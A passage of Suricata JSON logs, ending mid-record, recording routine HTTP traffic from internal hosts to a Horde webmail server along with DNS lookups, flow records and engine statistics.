{"timestamp":"2020-02-29T00:11:19.437553+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955}} {"timestamp":"2020-02-29T00:11:20.000581+0000","event_type":"stats","stats":{"uptime":14332,"capture":{"kernel_packets":134594,"kernel_drops":0},"decoder":{"pkts":134594,"bytes":92874547,"invalid":185,"ipv4":133109,"ipv6":8,"ethernet":134594,"raw":0,"null":0,"sll":0,"tcp":127877,"udp":5032,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2743,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2759,"synack":2750,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1783,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2297,"failed_udp":111},"tx":{"http":4593,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2376}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20169,"memcap_state":0,"memcap_global":0},"http":{"memuse":84300,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:22.863642+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26215,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:22.975027+0000","flow_id":909784335920538,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46116,"proto":"UDP","dns":{"type":"answer","id":26215,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:11:23.010667+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 
HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:11:24.438797+0000","flow_id":1212171508187051,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":955},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2478,"tx_id":1}} {"timestamp":"2020-02-29T00:11:26.519207+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2913,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:26.627443+0000","flow_id":788838057176103,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46659,"proto":"UDP","dns":{"type":"answer","id":2913,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412}} {"timestamp":"2020-02-29T00:11:26.701011+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":248,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:27.000184+0000","event_type":"stats","stats":{"uptime":14339,"capture":{"kernel_packets":134631,"kernel_drops":0},"decoder":{"pkts":134632,"bytes":92889142,"invalid":185,"ipv4":133147,"ipv6":8,"ethernet":134632,"raw":0,"null":0,"sll":0,"tcp":127911,"udp":5036,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2744,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2760,"synack":2751,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1785,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2299,"failed_udp":111},"tx":{"http":4595,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2378}},"flow_mgr":{"closed_pruned":2726,"new_pruned":15,"est_pruned":2350,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":78960,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:28.014904+0000","flow_id":563408108453862,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34794,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:11:31.000765+0000","flow_id":1641341801378157,"event_type":"flow","src_ip":"192.168.10.122","src_port":43136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:30.700781+0000","end":"2020-02-29T00:06:30.811812+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:31.702838+0000","flow_id":1771509394621068,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":412},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":757,"tx_id":0}} 
{"timestamp":"2020-02-29T00:11:31.748325+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13638,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:31.856514+0000","flow_id":480248952220453,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48196,"proto":"UDP","dns":{"type":"answer","id":13638,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:32.000674+0000","flow_id":1124421027940285,"event_type":"flow","src_ip":"192.168.10.81","src_port":52714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1095,"bytes_toclient":6725,"start":"2020-02-29T00:10:26.051133+0000","end":"2020-02-29T00:10:31.236100+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:32.016594+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624}} {"timestamp":"2020-02-29T00:11:34.000232+0000","event_type":"stats","stats":{"uptime":14346,"capture":{"kernel_packets":134652,"kernel_drops":0},"decoder":{"pkts":134664,"bytes":92900687,"invalid":185,"ipv4":133179,"ipv6":8,"ethernet":134664,"raw":0,"null":0,"sll":0,"tcp":127939,"udp":5040,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2746,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2762,"synack":2753,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1787,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2301,"failed_udp":111},"tx":{"http":4597,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2380}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2351,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74685,"memcap":0}}} 
{"timestamp":"2020-02-29T00:11:34.034672+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46822,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:34.142465+0000","flow_id":16980894975856,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59771,"proto":"UDP","dns":{"type":"answer","id":46822,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:34.295285+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34798,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982}} {"timestamp":"2020-02-29T00:11:35.996627+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:11:35.996750+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:11:35.999895+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":0}} {"timestamp":"2020-02-29T00:11:35.999800+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:11:36.001784+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213}} {"timestamp":"2020-02-29T00:11:36.003246+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","state":"CLOSED","stored":false,"size":213,"tx_id":1}} 
{"timestamp":"2020-02-29T00:11:36.013992+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:11:36.023877+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7550,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:36.041297+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:11:36.054763+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.257907+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4763,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.259305+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} 
{"timestamp":"2020-02-29T00:11:36.259648+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:11:36.260038+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 